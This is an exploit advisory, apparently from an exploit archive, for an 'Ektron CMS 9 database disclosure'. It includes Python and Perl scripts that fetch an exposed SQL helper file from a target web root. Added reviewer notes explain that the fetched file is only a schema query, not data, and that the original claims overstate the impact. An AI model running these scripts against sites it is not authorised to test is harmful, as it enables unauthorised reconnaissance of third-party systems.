###########################################################################
# Exploit Title : Ektron CMS 9 Database Disclosure Exploit
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 02/04/2019
# Vendor Homepage : ektron.com episerver.com/products/platform/ektron/
# Software Download Link : github.com/whanrott/Ektron_sql_scripts/archive/master.zip
#   (note: this link is a third-party GitHub repository of SQL helper scripts
#    for examining an Ektron database, not a vendor download of the CMS itself;
#    the "exploit" below targets those helper scripts, see the Impact section)
# Software Information Link : ektron.com/Products/Web-CMS/Web-Content-Management/
#                             github.com/whanrott/Ektron_sql_scripts
#                             cmsmatrix.org/matrix/cms-matrix/ektron-cms
# Software Affected Versions : 8.6 and 9
#   (the helper-script repository describes itself as written for Ektron CMS v9;
#    the 8.6 claim is not supported by anything else on this page)
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-200 [ Information Exposure ]
#                      CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
###########################################################################
# Description about Software :
***************************
Ektron Web Content Management System (CMS) is the platform of choice for more than 3,700 global companies.
Episerver Digital Experience Cloud™: the only platform that puts Digital Content, Commerce and Marketing in one screen.
Create, deploy, and manage enterprise-scale, global, personalized websites.
Empower users, designers, and developers to work in parallel, speeding time-to-web.
Make content updates directly on the site using an intuitive browser-based editor.
Create site wireframes, ensuring global brand consistency.
Speed development using Ektron's Framework API, pre-built .NET controls, and standard development tools like Microsoft Visual Studio.
###########################################################################
# Impact :
***********
* The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere.
* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
* This information is highly sensitive and should not be found on a production system.
* Reviewer note on what is actually exposed: the .sql files listed below are
  administrative helper scripts (schema, content and permission queries) taken
  from the whanrott/Ektron_sql_scripts repository named in the header, not
  exported data. The file the scripts below fetch, find_database_column_names.sql,
  is a SELECT against INFORMATION_SCHEMA.COLUMNS with its filters commented out
  (reproduced below). Retrieving it over HTTP therefore proves that the helper
  scripts were deployed inside a web-served directory (CWE-538) and leaks only
  minor hints about the schema (table-name suffixes such as %_tbl and
  %_tracking); it does not return database contents. Because the files come
  from a separate repository rather than from the vendor, the condition
  presumably exists only where an operator copied them into the web root, so
  the remediation is to remove them from web-served paths (or refuse to serve
  *.sql) rather than to patch the CMS.

Information :
*************
Ektron SQL Scripts : Simple SQL scripts for examining the database of Ektron CMS v9.

Scripts
Script Name                      Purpose
find_all_users.sql               List all users with last login date
find_content_and_folder.sql      List all content, showing folder. Filter by multiple criteria
find_content_history.sql         Show content item history
find_database_column_names.sql   Query the database structure to find matching tables and column names
find_folder_permissions.sql      List folder permissions
###########################################################################
Files :
*****
/find_all_users.sql
/find_content_alias_and_template.sql
/find_content_and_folder.sql
/find_content_history.sql
/find_database_column_names.sql
/find_folder_permissions.sql
/find_menu_items.sql
/find_meta_course_accreditation.sql
/find_meta_course_combinations.sql
/find_mismatched_content.sql
/where_is_this_content_used.sql

Information [ find_database_column_names.sql ]
*********************************************
(contents of the helper script as published; line breaks restored so the
 "--" comment lines are readable, otherwise unchanged)

/* look for table column names */
--USE ;
SELECT TABLE_NAME
      ,COLUMN_NAME
      ,DATA_TYPE
      ,CHARACTER_MAXIMUM_LENGTH
FROM INFORMATION_SCHEMA.COLUMNS
WHERE
-- COLUMN_NAME LIKE '%%'
--AND TABLE_NAME LIKE '%_tbl'
--AND (TABLE_NAME LIKE '%%' OR COLUMN_NAME LIKE '%template%')
--AND ( COLUMN_NAME LIKE '%%' OR TABLE_NAME LIKE '%%' )
AND COLUMN_NAME LIKE '%%'
AND TABLE_NAME NOT LIKE '%_tracking'
ORDER BY TABLE_NAME, COLUMN_NAME ;
###########################################################################
# Database
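# Disclosure Information Exposure Exploit 1 :
# ***********************************************
#
# NOTE(review): both "exploits" on this page do the same thing: they request
# /find_database_column_names.sql from the target web root.  That file is one
# of the DBA helper scripts from the third-party whanrott/Ektron_sql_scripts
# repository listed in the header; its body is a SELECT against
# INFORMATION_SCHEMA.COLUMNS and it holds no data.  A successful fetch shows
# that the helper scripts were deployed inside a web-served directory
# (CWE-538); it does not return database contents and it is not a flaw in
# Ektron CMS code.  Only run either script against systems you are
# authorised to test.
#
# The original Exploit 1 was Python 2 (urllib2, print statement).  It is kept
# here, corrected, inside a POD block so that this file stays one runnable
# Perl program; copy it out to use it.

=begin python

#!/usr/bin/python
# Python 2 only: urllib2 and the print statement are not available in Python 3.
import re
from urllib2 import Request, urlopen, HTTPError, URLError

disc = "/find_database_column_names.sql"
url = raw_input("URL: ").rstrip("/")
try:
    html = urlopen(Request(url + disc), timeout=10).read()
except (HTTPError, URLError) as exc:
    print "Request failed: %s" % exc
    raise SystemExit(1)
print "Result"
# The original searched the body for "resources.*=*", which matches nothing
# meaningful in this file.  Look for the query's own text instead, so that a
# "not found" page served with HTTP 200 is not reported as a hit.
if re.search(r"INFORMATION_SCHEMA\.COLUMNS", html):
    print "[+] Helper script present at %s%s (schema query only, no data)" % (url, disc)
else:
    print "[!] Response from %s%s does not look like the helper script" % (url, disc)

=end python

=cut

###########################################################################
# Database Disclosure Information Exposure Exploit 2 :
# ***********************************************
#!/usr/bin/perl
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army
#
# Fetches find_database_column_names.sql from a target and saves it locally.
#
# Changes from the original script:
#   * use strict / use warnings.
#   * The system('cls'), system('Ektron CMS V.9 Database Disclosure Exploit')
#     and system('color a') calls are gone: the second tried to execute the
#     banner text as a command, and the other two are Windows-only cosmetics,
#     which contradicts "Tested On : Windows and Linux".
#   * The output path is no longer hard-coded to D:/ (the original also read a
#     third argument into $File and then overwrote it).  It is now the optional
#     third argument, defaulting to the remote file's own name in the current
#     directory.
#   * HTTP 200 alone is not treated as success: many sites answer unknown
#     paths with a 200 "not found" page.  The body must contain the query's
#     own text before it is saved and reported.
#   * A scheme given in the target (https://host) is honoured; otherwise
#     http:// is assumed, as before.
use strict;
use warnings;
use LWP::UserAgent;

# File requested from the target, and a string its body must contain.  Both
# come from the helper-script listing earlier on this page.
my $TARGET_FILE = 'find_database_column_names.sql';
my $SIGNATURE   = 'INFORMATION_SCHEMA.COLUMNS';

# Print usage, keeping the original's two example invocations.
sub help {
    print "[+] usage1 : perl $0 site.com /path/ [output-file]\n";
    print "[+] usage2 : perl $0 localhost / [output-file]\n";
    return;
}

# True when a response body is plausibly the helper script rather than a
# generic page: it must be defined and contain the INFORMATION_SCHEMA query.
sub looks_like_sql_script {
    my ($body) = @_;
    return 0 unless defined $body;
    return index($body, $SIGNATURE) >= 0 ? 1 : 0;
}

# Build the request URL from the target (host, host:port or scheme://host)
# and the path prefix, normalising the slashes around the path so that
# "site.com /path" and "site.com /path/" give the same URL.
sub build_url {
    my ($target, $path) = @_;
    my $base = $target =~ m{\A https?:// }xms ? $target : "http://$target";
    $base =~ s{/+\z}{};
    $path = "/$path" unless $path =~ m{\A/};
    $path .= '/'     unless $path =~ m{/\z};
    return $base . $path . $TARGET_FILE;
}

# Entry point: (target, path, optional output file).  Returns the process
# exit status: 0 only when the helper script was fetched and saved.
sub main {
    my ($target, $path, $out) = @_;

    if (!defined $target || !defined $path) {
        print "[-]How To Use\n\n";
        help();
        return 1;
    }
    $out = $TARGET_FILE unless defined $out;

    my $url = build_url($target, $path);
    print "\n Wait Please Dear Hacker!!! \n\n";

    my $ua       = LWP::UserAgent->new(timeout => 15);
    my $response = $ua->get($url);

    if (!$response->is_success) {
        print "[!] Exploiting $url Failed !\n[!] " . $response->status_line . "\n";
        return 1;
    }

    my $body = $response->content;    # raw bytes, as :content_file saved them
    if (!looks_like_sql_script($body)) {
        print "[!] $url answered " . $response->status_line
            . " but the body does not contain '$SIGNATURE'; "
            . "probably a soft-404 page, not the helper script\n";
        return 1;
    }

    open my $fh, '>:raw', $out or die "Cannot write $out: $!\n";
    print {$fh} $body;
    close $fh or die "Cannot close $out: $!\n";

    print "[+] $url Exploited!\n\n";
    # The original said "Database saved", which overstates what was fetched.
    print "[+] Helper script saved to $out (schema query template only; it contains no data)\n";
    return 0;
}

# Run main() only when executed directly, so the subs can be loaded for testing.
exit main(@ARGV) unless caller;
1;
###########################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###########################################################################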